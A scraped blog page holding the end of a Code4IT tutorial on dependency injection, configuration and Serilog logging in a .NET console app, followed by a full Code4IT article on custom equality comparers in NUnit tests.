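    <ItemGroup>
      <None Update="appsettings.json">
        <CopyToOutputDirectory>Always</CopyToOutputDirectory>
      </None>
    </ItemGroup>
    ```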

    Now, build and run the project, and you’ll see the correct message: “My wonderful number is 899”.

    Clearly, the same values can be accessed via IConfiguration.
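    For reference, reading the same value through IConfiguration would look like this (a sketch, as an alternative to the IOptions<T> version above):

    ```csharp
    using Microsoft.Extensions.Configuration;

    public class NumberRepository : INumberRepository
    {
        private readonly IConfiguration _configuration;

        public NumberRepository(IConfiguration configuration) => _configuration = configuration;

        // Reads the value with a colon-separated key instead of a bound POCO
        public int GetNumber() => _configuration.GetValue<int>("Number:DefaultNumber");
    }
    ```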

    Add Serilog logging to log on Console and File

    Finally, we can add Serilog logs to our console applications – as well as define Sinks.

    To add Serilog, you first have to install these NuGet packages:

    • Serilog.Extensions.Hosting and Serilog.Formatting.Compact to add the basics of Serilog;
    • Serilog.Settings.Configuration to read logging configurations from settings (if needed);
    • Serilog.Sinks.Console and Serilog.Sinks.File to add the Console and the File System as Sinks.

    Let’s get back to the CreateHost() method, and add a new section right after ConfigureServices:

    .UseSerilog((context, services, configuration) => configuration
        .ReadFrom.Configuration(context.Configuration)
        .ReadFrom.Services(services)
        .Enrich.FromLogContext()
        .WriteTo.Console()
        .WriteTo.File($"report-{DateTimeOffset.UtcNow.ToString("yyyy-MM-dd-HH-mm-ss")}.txt", restrictedToMinimumLevel: LogEventLevel.Warning)
        )
    

    Here we’re telling that we need to read the config from Settings, add logging context, and write both on Console and on File (only if the log message level is greater or equal than Warning).

    Then, add an ILogger here and there, and admire the final result:

    Serilog Logging is visible on the Console

    Final result

    To wrap up, here’s the final implementation of the Program class and the
    CreateHost method:

    private static void Main(string[] args)
    {
        IHost host = CreateHost();
        NumberWorker worker = ActivatorUtilities.CreateInstance<NumberWorker>(host.Services);
        worker.PrintNumber();
    }
    
    private static IHost CreateHost() =>
      Host
      .CreateDefaultBuilder()
      .ConfigureServices((context, services) =>
      {
          services.Configure<NumberConfig>(context.Configuration.GetSection("Number"));
    
          services.AddSingleton<INumberRepository, NumberRepository>();
          services.AddSingleton<INumberService, NumberService>();
      })
      .UseSerilog((context, services, configuration) => configuration
          .ReadFrom.Configuration(context.Configuration)
          .ReadFrom.Services(services)
          .Enrich.FromLogContext()
          .WriteTo.Console()
          .WriteTo.File($"report-{DateTimeOffset.UtcNow.ToString("yyyy-MM-dd-HH-mm-ss")}.txt", restrictedToMinimumLevel: LogEventLevel.Warning)
          )
      .Build();
    

    Further readings

    As always, a few resources to learn more about the topics discussed in this article.

    First and foremost, have a look at this article with a full explanation of Generic Hosts in a .NET Core application:

    🔗 .NET Generic Host in ASP.NET Core | Microsoft docs

    Then, if you recall, we’ve already learned how to print Serilog logs to the Console:

    🔗 How to log to Console with .NET Core and Serilog | Code4IT

    This article first appeared on Code4IT 🐧

    Lastly, we accessed configurations using IOptions<NumberConfig>. Did you know that there are other ways to access config?

    🔗 Understanding IOptions, IOptionsMonitor, and IOptionsSnapshot in .NET 7 | Code4IT

    as well as defining configurations for your project?

    🔗 3 (and more) ways to set configuration values in .NET | Code4IT

    Wrapping up

    In this article, we’ve learned how we can customize a .NET Console application to use dependency injection, external configurations, and Serilog logging.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link

  • Use custom Equality comparers in Nunit tests | Code4IT

    Use custom Equality comparers in Nunit tests | Code4IT


    When writing unit tests, there are smarter ways to check if two objects are equal than just comparing every field one by one.

    Table of Contents

    Just a second! 🫷
    If you are here, it means that you are a software developer.
    So, you know that storage, networking, and domain management have a cost .

    If you want to support this blog, please ensure that you have disabled the adblocker for this site.
    I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.

    Thank you for your understanding.
    Davide

    When writing unit tests, you might want to check that the result returned by a method is equal to the one you’re expecting.

    [Test]
    public void Reverse_Should_BeCorrect()
    {
      string input = "hello";
      string result = MyUtils.Reverse(input);
    
      Assert.That(result, Is.EqualTo("olleh"));
    }
    

    This approach works fine unless you want to check values on complex types that define no equality checks.

    public class Player
    {
      public int Id { get; set; }
      public string UserName { get; set; }
      public int Score { get; set; }
    }
    

    Let’s create a dummy method that clones a player:

    public static Player GetClone(Player source)
      => new Player
        {
          Id = source.Id,
          UserName = source.UserName,
          Score = source.Score
        };
    

    and call it this way:

    [Test]
    public void GetClone()
    {
      var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
      var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
      Assert.That(clonedPlayer, Is.EqualTo(originalPlayer));
    }
    

    Even though logically originalPlayer and clonedPlayer are equal, they are not the same: the test will fail!

    Lucky for us, we can specify the comparison rules!

    Equality function: great for simple checks

    Say that we don’t want to check that all the values match. We only care about Id and UserName.

    When we have just a few fields to check, we can use a function to specify that two items are equal:

    [Test]
    public void GetClone_WithEqualityFunction()
    {
      var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
      var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
      Assert.That(clonedPlayer, Is.EqualTo(originalPlayer).Using<Player>(
        (Player a, Player b) => a.Id == b.Id && a.UserName == b.UserName)
        );
    }
    

    Clearly, if the method becomes unreadable, you can refactor the comparer function as so:

    [Test]
    public void GetClone_WithEqualityFunction()
    {
      var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
      var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
      Func<Player, Player, bool> comparer = (Player a, Player b) => a.Id == b.Id && a.UserName == b.UserName;
    
      Assert.That(clonedPlayer, Is.EqualTo(originalPlayer).Using<Player>(comparer));
    }
    

    EqualityComparer class: best for complex scenarios

    If you have a complex scenario to validate, you can create a custom class that implements the IEqualityComparer interface. Here, you have to implement two methods: Equals and GetHashCode.

    Instead of just implementing the same check inside the Equals method, we're gonna try a different approach: we're gonna use GetHashCode to determine how to identify a Player, by generating a string used as a simple identifier, and then we're gonna use the HashCode of the resulting string for the actual comparison:

    public class PlayersComparer : IEqualityComparer<Player>
    {
        public bool Equals(Player? x, Player? y)
        {
            if (x is null || y is null)
                return x is null && y is null;
    
            return GetHashCode(x) == GetHashCode(y);
        }
    
        public int GetHashCode([DisallowNull] Player obj)
        {
            return $"{obj.Id}-{obj.UserName}".GetHashCode();
        }
    }
    

    Clearly, I’ve also added a check on nullability: (x is null && y is null).

    Now we can instantiate a new instance of PlayersComparer and use it to check whether two players are equivalent:

    [Test]
    public void GetClone_WithEqualityComparer()
    {
        var originalPlayer = new Player { Id = 1, UserName = "me", Score = 1 };
    
        var clonedPlayer = MyUtils.GetClone(originalPlayer);
    
        Assert.That(clonedPlayer, Is.EqualTo(originalPlayer).Using<Player>(new PlayersComparer()));
    }
    

    Of course, you can customize the Equals method to use whichever condition to validate the equivalence of two instances, depending on your business rules. For example, you can say that two vectors are equal if they have the exact same length and direction, even though the start and end points are different.
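    Following that vector example, here's a sketch of such a comparer (the Vector2D type is made up for illustration):

    ```csharp
    using System;
    using System.Collections.Generic;

    // A segment from (X1, Y1) to (X2, Y2)
    public record Vector2D(double X1, double Y1, double X2, double Y2)
    {
        public double Dx => X2 - X1;
        public double Dy => Y2 - Y1;
    }

    // Two vectors are "equal" when they have the same length and direction
    // (i.e. the same displacement), regardless of where they start and end
    public class VectorComparer : IEqualityComparer<Vector2D>
    {
        public bool Equals(Vector2D? a, Vector2D? b)
        {
            if (a is null || b is null)
                return a is null && b is null;

            return a.Dx == b.Dx && a.Dy == b.Dy;
        }

        public int GetHashCode(Vector2D v) => HashCode.Combine(v.Dx, v.Dy);
    }
    ```

    With this comparer, a vector from (0, 0) to (1, 1) and one from (5, 5) to (6, 6) are considered equal, even though their endpoints differ.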

    ❓ A question for you: where would you put the equality check: in the production code or in the tests project?

    Wrapping up

    As we’ve learned in this article, there are smarter ways to check if two objects are equal than just comparing every field one by one.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn! 🤜🤛

    Happy coding!

    🐧





    Source link